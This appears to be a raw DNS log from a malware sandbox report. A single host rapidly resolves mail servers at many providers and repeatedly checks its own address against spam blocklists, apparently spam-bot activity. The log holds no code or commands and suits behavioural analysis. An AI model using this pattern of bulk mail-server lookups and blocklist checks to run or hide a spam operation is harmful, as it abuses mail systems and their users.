Sep 5, 2021 15:51:34.502856016 CEST	8.8.8.8	192.168.2.4	0x95e0	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:34.539277077 CEST	8.8.8.8	192.168.2.4	0x5bd	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:34.539277077 CEST	8.8.8.8	192.168.2.4	0x5bd	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:34.539277077 CEST	8.8.8.8	192.168.2.4	0x5bd	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:34.539277077 CEST	8.8.8.8	192.168.2.4	0x5bd	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:34.539277077 CEST	8.8.8.8	192.168.2.4	0x5bd	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:34.539277077 CEST	8.8.8.8	192.168.2.4	0x5bd	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:34.539277077 CEST	8.8.8.8	192.168.2.4	0x5bd	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:34.539277077 CEST	8.8.8.8	192.168.2.4	0x5bd	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:34.572052956 CEST	8.8.8.8	192.168.2.4	0x7b2	No error (0)	extmail.bigpond.com		203.36.137.234	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:34.572052956 CEST	8.8.8.8	192.168.2.4	0x7b2	No error (0)	extmail.bigpond.com		203.36.172.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.703423977 CEST	8.8.8.8	192.168.2.4	0xb439	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.706289053 CEST	8.8.8.8	192.168.2.4	0x7755	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.706289053 CEST	8.8.8.8	192.168.2.4	0x7755	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.706289053 CEST	8.8.8.8	192.168.2.4	0x7755	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.706289053 CEST	8.8.8.8	192.168.2.4	0x7755	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.706289053 CEST	8.8.8.8	192.168.2.4	0x7755	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.706289053 CEST	8.8.8.8	192.168.2.4	0x7755	No error (0)	mta6.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.706289053 CEST	8.8.8.8	192.168.2.4	0x7755	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.706289053 CEST	8.8.8.8	192.168.2.4	0x7755	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.716434002 CEST	8.8.8.8	192.168.2.4	0xdf43	No error (0)	extmail.bigpond.com		203.36.137.234	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.716434002 CEST	8.8.8.8	192.168.2.4	0xdf43	No error (0)	extmail.bigpond.com		203.36.172.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.719419003 CEST	8.8.8.8	192.168.2.4	0xf681	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.768963099 CEST	8.8.8.8	192.168.2.4	0x9b0d	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.841959000 CEST	8.8.8.8	192.168.2.4	0xb135	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.892317057 CEST	8.8.8.8	192.168.2.4	0x34f7	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.935233116 CEST	8.8.8.8	192.168.2.4	0xc60b	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.987811089 CEST	8.8.8.8	192.168.2.4	0x55c2	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.051400900 CEST	8.8.8.8	192.168.2.4	0xfe33	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.094347000 CEST	8.8.8.8	192.168.2.4	0xbd09	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.172584057 CEST	8.8.8.8	192.168.2.4	0x92c8	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.279630899 CEST	84.200.69.80	192.168.2.4	0x300	No error (0)	41.52.17.84.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 5, 2021 15:51:36.295326948 CEST	8.8.8.8	192.168.2.4	0xf632	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.412326097 CEST	8.8.8.8	192.168.2.4	0x98b5	No error (0)	extmail.bigpond.com		203.36.137.234	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.412326097 CEST	8.8.8.8	192.168.2.4	0x98b5	No error (0)	extmail.bigpond.com		203.36.172.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.421350002 CEST	8.8.8.8	192.168.2.4	0xaddc	No error (0)	lycos.de			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:36.551862001 CEST	8.8.8.8	192.168.2.4	0x8a14	No error (0)	mx.lycos.de.cust.b.hostedemail.com		64.98.36.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.659965992 CEST	8.8.8.8	192.168.2.4	0x513e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.97	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.659965992 CEST	8.8.8.8	192.168.2.4	0x513e	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.17.161	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.664042950 CEST	8.8.8.8	192.168.2.4	0x88d2	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.664042950 CEST	8.8.8.8	192.168.2.4	0x88d2	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.664042950 CEST	8.8.8.8	192.168.2.4	0x88d2	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.664042950 CEST	8.8.8.8	192.168.2.4	0x88d2	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.664042950 CEST	8.8.8.8	192.168.2.4	0x88d2	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.664042950 CEST	8.8.8.8	192.168.2.4	0x88d2	No error (0)	mta6.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.664042950 CEST	8.8.8.8	192.168.2.4	0x88d2	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.664042950 CEST	8.8.8.8	192.168.2.4	0x88d2	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.860620975 CEST	8.8.8.8	192.168.2.4	0x7959	No error (0)	extmail.bigpond.com		203.36.137.234	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.860620975 CEST	8.8.8.8	192.168.2.4	0x7959	No error (0)	extmail.bigpond.com		203.36.172.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.910200119 CEST	8.8.8.8	192.168.2.4	0xfe3d	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:37.152934074 CEST	8.8.8.8	192.168.2.4	0xb062	No error (0)	cxr.mx.a.cloudfilter.net		52.73.137.222	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:37.152934074 CEST	8.8.8.8	192.168.2.4	0xb062	No error (0)	cxr.mx.a.cloudfilter.net		34.212.80.54	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:37.152934074 CEST	8.8.8.8	192.168.2.4	0xb062	No error (0)	cxr.mx.a.cloudfilter.net		18.209.118.139	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:37.152934074 CEST	8.8.8.8	192.168.2.4	0xb062	No error (0)	cxr.mx.a.cloudfilter.net		35.162.106.154	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:37.586849928 CEST	8.8.8.8	192.168.2.4	0x83d4	No error (0)	www.google.com		172.217.168.68	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:37.590135098 CEST	8.8.8.8	192.168.2.4	0x4ec3	No error (0)	orange.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:37.633228064 CEST	8.8.8.8	192.168.2.4	0x16c0	No error (0)	custmx.cscdns.net		198.58.121.58	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:37.646084070 CEST	8.8.8.8	192.168.2.4	0x8dc3	No error (0)	rogers.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:37.729703903 CEST	8.8.8.8	192.168.2.4	0xed8d	No error (0)	mx-rogers.mail.am0.yahoodns.net		67.195.204.82	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:37.729703903 CEST	8.8.8.8	192.168.2.4	0xed8d	No error (0)	mx-rogers.mail.am0.yahoodns.net		67.195.228.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:38.015511036 CEST	8.8.8.8	192.168.2.4	0x8a	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:38.015511036 CEST	8.8.8.8	192.168.2.4	0x8a	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:38.015511036 CEST	8.8.8.8	192.168.2.4	0x8a	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:38.015511036 CEST	8.8.8.8	192.168.2.4	0x8a	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:38.015511036 CEST	8.8.8.8	192.168.2.4	0x8a	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:38.015511036 CEST	8.8.8.8	192.168.2.4	0x8a	No error (0)	mta6.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:38.015511036 CEST	8.8.8.8	192.168.2.4	0x8a	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:38.015511036 CEST	8.8.8.8	192.168.2.4	0x8a	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:38.231674910 CEST	8.8.8.8	192.168.2.4	0x913d	No error (0)	sky.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:38.272330046 CEST	8.8.8.8	192.168.2.4	0xf6cf	No error (0)	mx-eu.mail.am0.yahoodns.net		188.125.72.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:38.272330046 CEST	8.8.8.8	192.168.2.4	0xf6cf	No error (0)	mx-eu.mail.am0.yahoodns.net		188.125.72.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:38.295109034 CEST	8.8.8.8	192.168.2.4	0xb464	No error (0)	mail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:38.295109034 CEST	8.8.8.8	192.168.2.4	0xb464	No error (0)	mail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:38.343452930 CEST	8.8.8.8	192.168.2.4	0x4529	No error (0)	mx00.mail.com		74.208.5.20	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:38.624634027 CEST	8.8.8.8	192.168.2.4	0x1a33	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:38.689523935 CEST	8.8.8.8	192.168.2.4	0xdeb	No error (0)	mx-eu.mail.am0.yahoodns.net		188.125.72.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:38.689523935 CEST	8.8.8.8	192.168.2.4	0xdeb	No error (0)	mx-eu.mail.am0.yahoodns.net		188.125.72.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.173520088 CEST	8.8.8.8	192.168.2.4	0x2358	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.173520088 CEST	8.8.8.8	192.168.2.4	0x2358	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.173520088 CEST	8.8.8.8	192.168.2.4	0x2358	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.173520088 CEST	8.8.8.8	192.168.2.4	0x2358	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.173520088 CEST	8.8.8.8	192.168.2.4	0x2358	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.173520088 CEST	8.8.8.8	192.168.2.4	0x2358	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.173520088 CEST	8.8.8.8	192.168.2.4	0x2358	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.173520088 CEST	8.8.8.8	192.168.2.4	0x2358	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.179167032 CEST	8.8.8.8	192.168.2.4	0xc25e	No error (0)	al-ip4-mx-vip2.prodigy.net		144.160.235.144	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.206614017 CEST	8.8.8.8	192.168.2.4	0xa60	No error (0)	horsebarninfo.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:39.311408043 CEST	8.8.8.8	192.168.2.4	0xabf6	No error (0)	mail.h-email.net		54.190.26.211	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.311408043 CEST	8.8.8.8	192.168.2.4	0xabf6	No error (0)	mail.h-email.net		54.244.49.115	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.311408043 CEST	8.8.8.8	192.168.2.4	0xabf6	No error (0)	mail.h-email.net		34.223.6.127	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.311408043 CEST	8.8.8.8	192.168.2.4	0xabf6	No error (0)	mail.h-email.net		18.237.235.220	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.311408043 CEST	8.8.8.8	192.168.2.4	0xabf6	No error (0)	mail.h-email.net		54.200.93.251	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.311408043 CEST	8.8.8.8	192.168.2.4	0xabf6	No error (0)	mail.h-email.net		34.212.139.205	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.311408043 CEST	8.8.8.8	192.168.2.4	0xabf6	No error (0)	mail.h-email.net		34.212.36.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.311408043 CEST	8.8.8.8	192.168.2.4	0xabf6	No error (0)	mail.h-email.net		54.187.110.113	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.311408043 CEST	8.8.8.8	192.168.2.4	0xabf6	No error (0)	mail.h-email.net		34.222.93.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.311408043 CEST	8.8.8.8	192.168.2.4	0xabf6	No error (0)	mail.h-email.net		34.220.245.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.734961987 CEST	8.8.8.8	192.168.2.4	0x708d	No error (0)	www.google.com		172.217.168.68	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:40.020510912 CEST	8.8.8.8	192.168.2.4	0x197a	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.142102003 CEST	8.8.8.8	192.168.2.4	0xf3c6	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.160978079 CEST	8.8.8.8	192.168.2.4	0x698d	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.160978079 CEST	8.8.8.8	192.168.2.4	0x698d	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.160978079 CEST	8.8.8.8	192.168.2.4	0x698d	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.160978079 CEST	8.8.8.8	192.168.2.4	0x698d	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.160978079 CEST	8.8.8.8	192.168.2.4	0x698d	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.160978079 CEST	8.8.8.8	192.168.2.4	0x698d	No error (0)	mta6.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.160978079 CEST	8.8.8.8	192.168.2.4	0x698d	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.160978079 CEST	8.8.8.8	192.168.2.4	0x698d	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.430500031 CEST	8.8.8.8	192.168.2.4	0x6ad6	No error (0)	castec.dk			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:41.430500031 CEST	8.8.8.8	192.168.2.4	0x6ad6	No error (0)	castec.dk			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:41.430500031 CEST	8.8.8.8	192.168.2.4	0x6ad6	No error (0)	castec.dk			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:41.430500031 CEST	8.8.8.8	192.168.2.4	0x6ad6	No error (0)	castec.dk			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:41.430500031 CEST	8.8.8.8	192.168.2.4	0x6ad6	No error (0)	castec.dk			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:41.430500031 CEST	8.8.8.8	192.168.2.4	0x6ad6	No error (0)	castec.dk			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:41.430500031 CEST	8.8.8.8	192.168.2.4	0x6ad6	No error (0)	castec.dk			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:41.500163078 CEST	8.8.8.8	192.168.2.4	0xa5b8	No error (0)	ALT2.ASPMX.L.google.com		74.125.200.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.672732115 CEST	8.8.8.8	192.168.2.4	0x87bd	No error (0)	e-garfield.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:41.672732115 CEST	8.8.8.8	192.168.2.4	0x87bd	No error (0)	e-garfield.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:41.719837904 CEST	8.8.8.8	192.168.2.4	0xa368	No error (0)	mx37.mb5p.com		37.139.4.134	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.719837904 CEST	8.8.8.8	192.168.2.4	0xa368	No error (0)	mx37.mb5p.com		68.183.127.86	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.719837904 CEST	8.8.8.8	192.168.2.4	0xa368	No error (0)	mx37.mb5p.com		143.198.175.12	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.719837904 CEST	8.8.8.8	192.168.2.4	0xa368	No error (0)	mx37.mb5p.com		157.230.233.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.719837904 CEST	8.8.8.8	192.168.2.4	0xa368	No error (0)	mx37.mb5p.com		37.139.4.118	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.719837904 CEST	8.8.8.8	192.168.2.4	0xa368	No error (0)	mx37.mb5p.com		37.139.4.171	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.719837904 CEST	8.8.8.8	192.168.2.4	0xa368	No error (0)	mx37.mb5p.com		134.209.79.108	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.719837904 CEST	8.8.8.8	192.168.2.4	0xa368	No error (0)	mx37.mb5p.com		37.139.4.163	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:42.313606024 CEST	8.8.8.8	192.168.2.4	0x4926	No error (0)	microsoft-com.mail.protection.outlook.com		104.47.53.36	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:42.313606024 CEST	8.8.8.8	192.168.2.4	0x4926	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.212.0	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.280740976 CEST	8.8.8.8	192.168.2.4	0x6e50	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.281526089 CEST	8.8.8.8	192.168.2.4	0xac5f	No error (0)	live-com.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.281526089 CEST	8.8.8.8	192.168.2.4	0xac5f	No error (0)	live-com.olc.protection.outlook.com		104.47.18.225	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.501306057 CEST	8.8.8.8	192.168.2.4	0xbdff	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.501306057 CEST	8.8.8.8	192.168.2.4	0xbdff	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.501306057 CEST	8.8.8.8	192.168.2.4	0xbdff	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.501306057 CEST	8.8.8.8	192.168.2.4	0xbdff	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.501306057 CEST	8.8.8.8	192.168.2.4	0xbdff	No error (0)	mta6.am0.yahoodns.net		67.195.204.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.501306057 CEST	8.8.8.8	192.168.2.4	0xbdff	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.501306057 CEST	8.8.8.8	192.168.2.4	0xbdff	No error (0)	mta6.am0.yahoodns.net		67.195.204.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.501306057 CEST	8.8.8.8	192.168.2.4	0xbdff	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.794481993 CEST	8.8.8.8	192.168.2.4	0x24e0	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.846370935 CEST	8.8.8.8	192.168.2.4	0xd5d2	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.908365011 CEST	8.8.8.8	192.168.2.4	0x39ae	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.964610100 CEST	8.8.8.8	192.168.2.4	0x2c50	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.071408987 CEST	8.8.8.8	192.168.2.4	0x813	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.099927902 CEST	8.8.8.8	192.168.2.4	0x6c4e	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.135334969 CEST	8.8.8.8	192.168.2.4	0x811b	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.188198090 CEST	8.8.8.8	192.168.2.4	0x5f29	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.240200043 CEST	8.8.8.8	192.168.2.4	0x831d	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.434942961 CEST	8.8.8.8	192.168.2.4	0x15f9	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.441036940 CEST	8.8.8.8	192.168.2.4	0xbd9f	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.441036940 CEST	8.8.8.8	192.168.2.4	0xbd9f	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.441036940 CEST	8.8.8.8	192.168.2.4	0xbd9f	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.441036940 CEST	8.8.8.8	192.168.2.4	0xbd9f	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.441036940 CEST	8.8.8.8	192.168.2.4	0xbd9f	No error (0)	mta6.am0.yahoodns.net		67.195.204.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.441036940 CEST	8.8.8.8	192.168.2.4	0xbd9f	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.441036940 CEST	8.8.8.8	192.168.2.4	0xbd9f	No error (0)	mta6.am0.yahoodns.net		67.195.204.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.441036940 CEST	8.8.8.8	192.168.2.4	0xbd9f	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.472477913 CEST	8.8.8.8	192.168.2.4	0xf0fe	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:46.093063116 CEST	8.8.8.8	192.168.2.4	0x8179	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.093170881 CEST	8.8.8.8	192.168.2.4	0x5440	No error (0)	shinnemo.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:47.134954929 CEST	8.8.8.8	192.168.2.4	0x8fcb	No error (0)	mail.mailerhost.net		34.220.245.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.134954929 CEST	8.8.8.8	192.168.2.4	0x8fcb	No error (0)	mail.mailerhost.net		18.237.235.220	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.134954929 CEST	8.8.8.8	192.168.2.4	0x8fcb	No error (0)	mail.mailerhost.net		34.212.139.205	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.134954929 CEST	8.8.8.8	192.168.2.4	0x8fcb	No error (0)	mail.mailerhost.net		54.190.26.211	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.134954929 CEST	8.8.8.8	192.168.2.4	0x8fcb	No error (0)	mail.mailerhost.net		54.244.49.115	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.134954929 CEST	8.8.8.8	192.168.2.4	0x8fcb	No error (0)	mail.mailerhost.net		54.200.93.251	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.134954929 CEST	8.8.8.8	192.168.2.4	0x8fcb	No error (0)	mail.mailerhost.net		34.222.93.91	A (IP address)	IN (0x0001)
